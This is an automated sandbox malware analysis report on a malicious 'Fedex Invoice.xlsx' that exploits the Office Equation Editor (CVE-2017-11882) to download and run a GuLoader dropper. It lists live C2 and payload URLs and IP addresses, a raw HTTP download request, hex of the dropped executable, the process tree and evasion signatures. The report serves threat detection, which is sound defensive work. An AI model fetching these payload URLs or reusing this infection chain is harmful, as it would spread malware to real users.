Loading ...

Play interactive tourEdit tour

Windows Analysis Report Fedex Invoice.xlsx

Overview

General Information

Sample Name:Fedex Invoice.xlsx
Analysis ID:483375
MD5:ec7f52b07d135f71c63fd20054a89646
SHA1:c89fa952eaef37a4ad0a120fa2c998cd989bbf62
SHA256:150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
Tags:FEDEXVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2624 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: 'C:\Users\Public\vbc.exe' MD5: ED004FE1AA9F4FA169A05B6716C03484)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2624, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2624, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1712
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2624, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1712

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Fedex Invoice.xlsxVirustotal: Detection: 30%Perma Link
    Source: Fedex Invoice.xlsxReversingLabs: Detection: 27%
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://212.192.246.25/rever/vbc.exeVirustotal: Detection: 7%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeVirustotal: Detection: 23%Perma Link
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 70MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://37.0.11.217/KELLYREMCOS_UOuJB118.bin
    Source: Joe Sandbox ViewASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:51:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 23:18:39 GMTETag: "21000-5cbe8af7096b4"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /rever/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 5DD04ABC.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /rever/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B60
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B84C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455467
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A062
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456872
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A07C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456C14
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453417
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454C34
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454C3C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A43B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A8CD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004504E1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456CEF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004558F7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004544FC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004534F9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459C85
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045588C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004570AD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004560A9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004568A9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A4B5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459D57
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00457152
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045115A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B568
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045517B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455D07
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454D0B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045710A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454515
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453D1D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455519
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A5C7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A9C0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455DCB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004509E9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00452DF5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004535F1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004545FA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045618F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004541A1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004551B1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B5BB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B65C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045265F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00457267
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459A6C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454A77
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455273
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455601
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045720D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B60D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045BA0B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455A1C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AE2B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454E3D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453E3F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A63F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459AC5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004546CA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454EE0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004532FD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451EFA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455EA6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004586A3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B6AB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004556B5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AAB3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B5E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451F6D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B73
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045037E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B779
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451B03
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A709
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455B10
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045731C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A320
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AB23
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045533B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A7DE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459FE7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004557EF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455BF6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004503F2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00450382
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045579F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459B98
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045339B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045ABA0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455FAB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B60 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456C14 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456CEF NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B5E NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B73 NtAllocateVirtualMemory,
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
    Source: Fedex Invoice.xlsxVirustotal: Detection: 30%
    Source: Fedex Invoice.xlsxReversingLabs: Detection: 27%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Fedex Invoice.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFBCB.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/21@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00419524 push esi; retn 000Ch
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451120 push FFFFFFB9h; retf
    Source: initial sampleStatic PE information: section name: .text entropy: 7.10781804596
    Source: initial sampleStatic PE information: section name: .text entropy: 7.10781804596
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

